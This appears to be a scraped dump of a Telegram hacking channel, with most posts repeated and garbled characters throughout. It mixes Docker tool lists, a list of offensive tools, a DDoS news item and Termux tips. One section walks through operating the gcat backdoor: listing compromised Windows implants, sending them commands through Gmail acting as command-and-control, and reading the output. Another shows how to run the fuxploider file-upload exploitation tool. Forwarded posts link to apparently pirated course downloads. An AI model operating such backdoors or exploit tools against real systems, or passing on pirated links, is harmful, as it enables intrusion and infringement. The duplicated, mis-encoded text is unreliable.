β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Monitoring 2020
- [Logspout](https://github.com/gliderlabs/logspout) - Log routing for Docker container logs by [@gliderlabs][gliderlabs]
- [Out-of-the-box Host/Container Monitoring/Logging/Alerting Stack](https://github.com/uschtwill/docker_monitoring_logging_alerting) - Docker host and container monitoring, logging and alerting out of the box using cAdvisor, Prometheus, Grafana for monitoring, Elasticsearch, Kibana and Logstash for logging and elastalert and Alertmanager for alerting. Set up in 5 Minutes. Secure mode for production use with built-in [Automated Nginx Reverse Proxy (jwilder's)][nginxproxy].
- [Zabbix Docker module](https://github.com/monitoringartist/Zabbix-Docker-Monitoring) - Zabbix module that provides discovery of running containers, CPU/memory/blk IO/net container metrics. Systemd Docker and LXC execution driver is also supported. It's a dynamically linked shared object library, so its performance is (~10x) better, than any script solution.
- [Zabbix Docker](https://github.com/gomex/docker-zabbix) - Monitor containers automatically using zabbix LLD feature.
β Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Monitoring 2020
- [Logspout](https://github.com/gliderlabs/logspout) - Log routing for Docker container logs by [@gliderlabs][gliderlabs]
- [Out-of-the-box Host/Container Monitoring/Logging/Alerting Stack](https://github.com/uschtwill/docker_monitoring_logging_alerting) - Docker host and container monitoring, logging and alerting out of the box using cAdvisor, Prometheus, Grafana for monitoring, Elasticsearch, Kibana and Logstash for logging and elastalert and Alertmanager for alerting. Set up in 5 Minutes. Secure mode for production use with built-in [Automated Nginx Reverse Proxy (jwilder's)][nginxproxy].
- [Zabbix Docker module](https://github.com/monitoringartist/Zabbix-Docker-Monitoring) - Zabbix module that provides discovery of running containers, CPU/memory/blk IO/net container metrics. Systemd Docker and LXC execution driver is also supported. It's a dynamically linked shared object library, so its performance is (~10x) better, than any script solution.
- [Zabbix Docker](https://github.com/gomex/docker-zabbix) - Monitor containers automatically using zabbix LLD feature.
β Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - gliderlabs/logspout: Log routing for Docker container logs
Log routing for Docker container logs. Contribute to gliderlabs/logspout development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 dockers for #Developers :
- CaptainDuckDuck - Open source Heroku-like platform with a one-liner installer and a GUI for managing apps - with serveral one-click databases and apps.
- Convox Rack - Convox Rack is open source PaaS built on top of expert infrastructure automation and devops best practices.
- Dcw - Docker-compose SSH wrapper: a very poor man PaaS, exposing the docker-compose and custom-container commands defined in container labels.
- Dokkudokku - Docker powered mini-Heroku that helps you build and manage the lifecycle of applications (originally by @progriumprogrium)
- Empire - A PaaS built on top of Amazon EC2 Container Service (ECS)
- Flynn - A next generation open source platform as a service
- OpenShiftopenshift - An open source PaaS built on Kuberneteskubernetes and optimized for Dockerized app development and deployment by Red Hat
- Tsuru - Tsuru is an extensible and open source Platform as a Service software
- Workflow - The open source PaaS for Kubernetes by Deis. Formerly Deis v1.
π¦2020 dockers for #Developers :
- CaptainDuckDuck - Open source Heroku-like platform with a one-liner installer and a GUI for managing apps - with serveral one-click databases and apps.
- Convox Rack - Convox Rack is open source PaaS built on top of expert infrastructure automation and devops best practices.
- Dcw - Docker-compose SSH wrapper: a very poor man PaaS, exposing the docker-compose and custom-container commands defined in container labels.
- Dokkudokku - Docker powered mini-Heroku that helps you build and manage the lifecycle of applications (originally by @progriumprogrium)
- Empire - A PaaS built on top of Amazon EC2 Container Service (ECS)
- Flynn - A next generation open source platform as a service
- OpenShiftopenshift - An open source PaaS built on Kuberneteskubernetes and optimized for Dockerized app development and deployment by Red Hat
- Tsuru - Tsuru is an extensible and open source Platform as a Service software
- Workflow - The open source PaaS for Kubernetes by Deis. Formerly Deis v1.
GitHub
GitHub - caprover/caprover: Scalable PaaS (automated Docker+nginx) - aka Heroku on Steroids
Scalable PaaS (automated Docker+nginx) - aka Heroku on Steroids - caprover/caprover
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Popular 2020 Hacking #Dockers :
- DetectionLab - Vagrant And Packer Scripts To Build A Lab Environment Complete With Security Tooling And Logging Best Practices
- Andor - Blind SQL Injection Tool With Golang
- SQL Injection Payload List
- WinPwn - Automation For Internal Windows Penetrationtest / AD-Security
- Ddoor - Cross Platform Backdoor Using Dns Txt Records
- Custom Header - Automatic Add New Header To Entire BurpSuite HTTP Requests
- SCShell - Fileless Lateral Movement Tool That Relies On ChangeServiceConfigA To Run Command
- Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos
- FireProx - AWS API Gateway Management Tool For Creating On The Fly HTTP Pass-Through Proxies For Unique IP Rotation
- DNCI - Dot Net Code Injector
- RdpThief - Extracting Clear Text Passwords From Mstsc.Exe Using API Hooking
- Leprechaun - Tool Used To Map Out The Network Data Flow To Help Penetration Testers Identify Potentially Valuable Targets
- Glances - An Eye On Your System. A Top/Htop Alternative For GNU/Linux, BSD, Mac OS And Windows Operating Systems
- Sshtunnel - SSH Tunnels To Remote Server
- RE:TERNAL - Repo Containing Docker-Compose Files And Setup Scripts Without Having To Clone The Individual Reternal Components
- Antispy - A Free But Powerful Anti Virus And Rootkits Toolkit
- Flan - A Pretty Sweet Vulnerability Scanner By CloudFlare
- Corsy - CORS Misconfiguration Scanner
- Kali Linux 2019.4 Release - Penetration Testing and Ethical Hacking Linux Distribution
- XML External Entity (XXE) Injection Payload List
β git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Popular 2020 Hacking #Dockers :
- DetectionLab - Vagrant And Packer Scripts To Build A Lab Environment Complete With Security Tooling And Logging Best Practices
- Andor - Blind SQL Injection Tool With Golang
- SQL Injection Payload List
- WinPwn - Automation For Internal Windows Penetrationtest / AD-Security
- Ddoor - Cross Platform Backdoor Using Dns Txt Records
- Custom Header - Automatic Add New Header To Entire BurpSuite HTTP Requests
- SCShell - Fileless Lateral Movement Tool That Relies On ChangeServiceConfigA To Run Command
- Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos
- FireProx - AWS API Gateway Management Tool For Creating On The Fly HTTP Pass-Through Proxies For Unique IP Rotation
- DNCI - Dot Net Code Injector
- RdpThief - Extracting Clear Text Passwords From Mstsc.Exe Using API Hooking
- Leprechaun - Tool Used To Map Out The Network Data Flow To Help Penetration Testers Identify Potentially Valuable Targets
- Glances - An Eye On Your System. A Top/Htop Alternative For GNU/Linux, BSD, Mac OS And Windows Operating Systems
- Sshtunnel - SSH Tunnels To Remote Server
- RE:TERNAL - Repo Containing Docker-Compose Files And Setup Scripts Without Having To Clone The Individual Reternal Components
- Antispy - A Free But Powerful Anti Virus And Rootkits Toolkit
- Flan - A Pretty Sweet Vulnerability Scanner By CloudFlare
- Corsy - CORS Misconfiguration Scanner
- Kali Linux 2019.4 Release - Penetration Testing and Ethical Hacking Linux Distribution
- XML External Entity (XXE) Injection Payload List
β git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
KitPloit - PenTest & Hacking Tools
DetectionLab - Vagrant And Packer Scripts To Build A Lab Environment Complete With Security Tooling And Logging Best Practices
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Mobile Device Security 2020 RESOURCES FOR BEGINERS :
The following are several of the resources covered in the Art of Hacking Series LiveLessons, Safari Live Training, and penetration testing books authored by Omar Santos.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Mobile Device Security 2020 RESOURCES FOR BEGINERS :
The following are several of the resources covered in the Art of Hacking Series LiveLessons, Safari Live Training, and penetration testing books authored by Omar Santos.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
theartofhacking.org
The Art of Hacking Video Courses and Live Training - Omar Santos
The Art of Hacking Video Courses and Live Training - A series of video courses, books, and live training by Omar Santos that help you enhance your cybersecurity career. You will learn the key tenets and the fundamentals of ethical hacking and security penetrationβ¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Amazon Cloud Service blocked a 2.3 Tbps DDoS attack in mid-February :
1οΈβ£Amazon said that its AWS Shield firewall blocked the most intense distributed denial of service (DDoS) attack to date in mid-February this year. The company disclosed in the recently published "AWS Shield Threat Landscape" report. Compared with the peak of 1.7 Tbps recorded in March 2018, the scale of this attack reached a record 2.3 Tbps.
2οΈβ£Although the name of the customer was not mentioned, Amazon revealed that the attack used the hijacked CLDAP web server, and employees of the company's AWS Shield department spent three days responding to the escalation of the threat.
3οΈβ£The good news is that thanks to the joint efforts of Internet Service Providers (ISPs), Content Delivery Networks (CDNs), and other Internet infrastructure companies, the current large-scale DDoS attacks have become quite rare.
4οΈβ£Link 11 pointed out in its first quarter 2020 report that the maximum DDoS attack traffic it mitigated was 406 Gbps. If we take the average, the single DDoS attack in the first quarter of this year is only about 5 Gbps.
5οΈβ£During the same period, the peak of DDoS attacks handled by Cloudflare exceeded 550 Gbps. Akamai announced this morning that the DDoS attack in the first week of June 2020 blocked only 1.44 Tbps of traffic.
6οΈβ£CLDAP is called "connectionless lightweight directory access protocol". As an alternative to the earlier LDAP protocol, it is mainly used to connect, search and modify shared directories on the Internet.
@UndercodeNews
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Amazon Cloud Service blocked a 2.3 Tbps DDoS attack in mid-February :
1οΈβ£Amazon said that its AWS Shield firewall blocked the most intense distributed denial of service (DDoS) attack to date in mid-February this year. The company disclosed in the recently published "AWS Shield Threat Landscape" report. Compared with the peak of 1.7 Tbps recorded in March 2018, the scale of this attack reached a record 2.3 Tbps.
2οΈβ£Although the name of the customer was not mentioned, Amazon revealed that the attack used the hijacked CLDAP web server, and employees of the company's AWS Shield department spent three days responding to the escalation of the threat.
3οΈβ£The good news is that thanks to the joint efforts of Internet Service Providers (ISPs), Content Delivery Networks (CDNs), and other Internet infrastructure companies, the current large-scale DDoS attacks have become quite rare.
4οΈβ£Link 11 pointed out in its first quarter 2020 report that the maximum DDoS attack traffic it mitigated was 406 Gbps. If we take the average, the single DDoS attack in the first quarter of this year is only about 5 Gbps.
5οΈβ£During the same period, the peak of DDoS attacks handled by Cloudflare exceeded 550 Gbps. Akamai announced this morning that the DDoS attack in the first week of June 2020 blocked only 1.44 Tbps of traffic.
6οΈβ£CLDAP is called "connectionless lightweight directory access protocol". As an alternative to the earlier LDAP protocol, it is mainly used to connect, search and modify shared directories on the Internet.
@UndercodeNews
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A stealthy Python based backdoor that uses Gmail as a command and control server
Termux-Linux
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£ git clone https://github.com/byt3bl33d3r/gcat.git
2οΈβ£cd gcat
3οΈβ£Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
> 964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on
4οΈβ£Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
* Command sent successfully with jobid: SH3C4gv
5οΈβ£Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --
β git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A stealthy Python based backdoor that uses Gmail as a command and control server
Termux-Linux
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£ git clone https://github.com/byt3bl33d3r/gcat.git
2οΈβ£cd gcat
3οΈβ£Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
> 964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on
4οΈβ£Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
* Command sent successfully with jobid: SH3C4gv
5οΈβ£Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --
β git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - byt3bl33d3r/gcat: A PoC backdoor that uses Gmail as a C&C server
A PoC backdoor that uses Gmail as a C&C server. Contribute to byt3bl33d3r/gcat development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
#Tips for Text Manipulation
#grep Commands Cheatsheets
- Ryan's Tutorials Cheat Sheet
- DevNotes cheatsheet
#Regex
- grep + regex cheatsheet
- nixCraft Tutorial
#Converters
- BigBash - Open-source converter that generates a bash one-liner from an SQL Select query, no database necessary
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
#Tips for Text Manipulation
#grep Commands Cheatsheets
- Ryan's Tutorials Cheat Sheet
- DevNotes cheatsheet
#Regex
- grep + regex cheatsheet
- nixCraft Tutorial
#Converters
- BigBash - Open-source converter that generates a bash one-liner from an SQL Select query, no database necessary
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
ryanstutorials.net
Linux Tutorial - Grep Cheat Sheet
A basic Linux grep cheat sheet. Contains links to relevant sections in the tutorial.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Termux tips/commands :
pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir βdir-name For creating directory
cd βdir-nameβ For changing directory
cat βfile-nameβ For reading any file
mv /path/file /path where file is moved For moving files from one path
to another.
cp /path/file /path where to copy file For copying files from one path
to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping βwebsite URLβ Helps verify IP level connectivity
toilet -f mono12 -F gay βyour textβ Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Termux tips/commands :
pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir βdir-name For creating directory
cd βdir-nameβ For changing directory
cat βfile-nameβ For reading any file
mv /path/file /path where file is moved For moving files from one path
to another.
cp /path/file /path where to copy file For copying files from one path
to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping βwebsite URLβ Helps verify IP level connectivity
toilet -f mono12 -F gay βyour textβ Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
Learn Social Engineering From Scratch
Udemy Link:
https://www.udemy.com/course/learn-social-engineering-from-scratch/
OneDrive Link:
https://mygavilan-my.sharepoint.com/:f:/g/personal/kali_masi_my_gavilan_edu/EpnjkaMNMRdJvQQNQOOEt60BMX2XzvhotZ1Uy3ZXPRsteQ?e=PdnUeY
Udemy Link:
https://www.udemy.com/course/learn-social-engineering-from-scratch/
OneDrive Link:
https://mygavilan-my.sharepoint.com/:f:/g/personal/kali_masi_my_gavilan_edu/EpnjkaMNMRdJvQQNQOOEt60BMX2XzvhotZ1Uy3ZXPRsteQ?e=PdnUeY
Udemy
Learn Social Engineering From Scratch Course Online
Hack secure accounts and computers (Windows, Apple Mac OS, Linux and Android) and secure yourself from hackers
Forwarded from Backup Legal Mega
Website Hacking / Penetration Testing & Bug Bounty Hunting
Udemy Link:
https://www.udemy.com/course/learn-website-hacking-penetration-testing-from-scratch/
OneDriveLink:
https://mygavilan-my.sharepoint.com/:f:/g/personal/kali_masi_my_gavilan_edu/EolDahOl3oNLnu7seFeznbkBY40nWeeFwVjIlCSNLGfJkg?e=Ds0kS1
Udemy Link:
https://www.udemy.com/course/learn-website-hacking-penetration-testing-from-scratch/
OneDriveLink:
https://mygavilan-my.sharepoint.com/:f:/g/personal/kali_masi_my_gavilan_edu/EolDahOl3oNLnu7seFeznbkBY40nWeeFwVjIlCSNLGfJkg?e=Ds0kS1
Udemy
Learn How to Test Your Websiteβs Security (From Scratch)
Hack websites and web applications like black hat hackers and secure them like experts.
Forwarded from Backup Legal Mega
Ethical Hacking: SQL Injection [919 MB]
https://www.pluralsight.com/courses/ethical-hacking-sql-injection
https://mega.nz/#F!V341kCwI!VSsLeUTLFoOvpXLIqMguzw
Digital Forensics with Kali Linux [809 MB]
https://www.packtpub.com/networking-and-servers/digital-forensics-kali-linux
https://mega.nz/#F!SpsQXY5J!KFd1E4yVyoh4Nm2AeNuU1w
https://www.pluralsight.com/courses/ethical-hacking-sql-injection
https://mega.nz/#F!V341kCwI!VSsLeUTLFoOvpXLIqMguzw
Digital Forensics with Kali Linux [809 MB]
https://www.packtpub.com/networking-and-servers/digital-forensics-kali-linux
https://mega.nz/#F!SpsQXY5J!KFd1E4yVyoh4Nm2AeNuU1w
Pluralsight
Ethical Hacking: SQL Injection
Forwarded from Backup Legal Mega
Linux Foundation Certified Engineer (2019) [3.24 GB]
https://linuxacademy.com/course/linux-foundation-certified-engineer/
https://mega.nz/#F!7xkzhQID!9KFPQdQfrToABn-W7g6gww
https://linuxacademy.com/course/linux-foundation-certified-engineer/
https://mega.nz/#F!7xkzhQID!9KFPQdQfrToABn-W7g6gww
Forwarded from Backup Legal Mega
PROGRAMMING AND HACKING COURSES!
75GB +
Link to the folder π
https://mega.nz/folder/I2Q32aKI#0wjcp4cpqxsJfjoi-CrqgA
75GB +
Link to the folder π
https://mega.nz/folder/I2Q32aKI#0wjcp4cpqxsJfjoi-CrqgA
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦updated 2020 File upload vulnerability scanner and exploitation tool :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/almandin/fuxploider.git
2οΈβ£cd fuxploider
3οΈβ£pip3 install -r requirements.txt
If you have problems with pip (and if you use windows apparently) :
3οΈβ£python3 -m pip install -r requirements.txt
For Docker installation
4οΈβ£# Build the docker image
docker build -t almandin/fuxploider
5οΈβ£python3 fuxploider.py -h
6οΈβ£Example run :
python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"
β Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦updated 2020 File upload vulnerability scanner and exploitation tool :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£git clone https://github.com/almandin/fuxploider.git
2οΈβ£cd fuxploider
3οΈβ£pip3 install -r requirements.txt
If you have problems with pip (and if you use windows apparently) :
3οΈβ£python3 -m pip install -r requirements.txt
For Docker installation
4οΈβ£# Build the docker image
docker build -t almandin/fuxploider
5οΈβ£python3 fuxploider.py -h
6οΈβ£Example run :
python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"
β Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - almandin/fuxploider: File upload vulnerability scanner and exploitation tool.
File upload vulnerability scanner and exploitation tool. - almandin/fuxploider